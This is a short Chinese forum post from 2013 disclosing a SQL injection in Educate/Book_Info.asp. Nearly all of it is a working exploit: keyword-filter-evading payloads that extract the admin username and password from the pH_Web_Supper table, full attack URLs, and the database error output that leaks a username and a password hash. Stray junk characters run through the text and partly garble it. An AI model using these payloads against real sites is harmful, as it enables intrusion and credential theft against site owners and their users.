漏洞出现在Educate/Book_Info.asp
! |* F+ \% p, d4 N" |* a + O, ?+ w% U7 z" Z
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
, w; q; G, C6 v & W8 U1 W3 c: T; x) t$ e5 _6 n
exp:如下, z% N. I/ D% E0 e% n( x
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
' f4 W- @' | q+ @" q查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 r! W0 d. V4 a8 c
# V# i8 t _, _& qhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" f6 a' d1 N* {$ m
2 Y+ A) g+ q& o/ v6 B+ dMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'- d. b' x' a& ]5 y1 e6 t
- \4 b1 M: p( x! Z' ]' z1 K+ Y
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。 k y. D4 s4 X( H* E0 Z5 M [
& ^1 Y2 z; }8 r6 J5 ^/ B( ]& I/Educate/Book_Info.asp,行 8
7 C$ g; j& I4 M3 c) _/ o1 O$ f: Q% _
' l- C, W/ T- q! o# X. l' c5 F* B& w2 xhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- W& | `2 y0 i( y& ]) @
5 F. M) L4 y0 F$ y/ U% E% rMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
$ r6 {, i% ` _4 l: C0 ~% h5 z
}# r/ x5 b. `! ^- }将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。9 J# Q4 \3 ]8 u( }1 N" ]
/ N* \5 O& ], @( W# k) [ B; m! X
/Educate/Book_Info.asp,行 80 W) s0 u; L5 \) o4 E
|
发表于 2013-2-16 21:44:16
收藏
支持
反对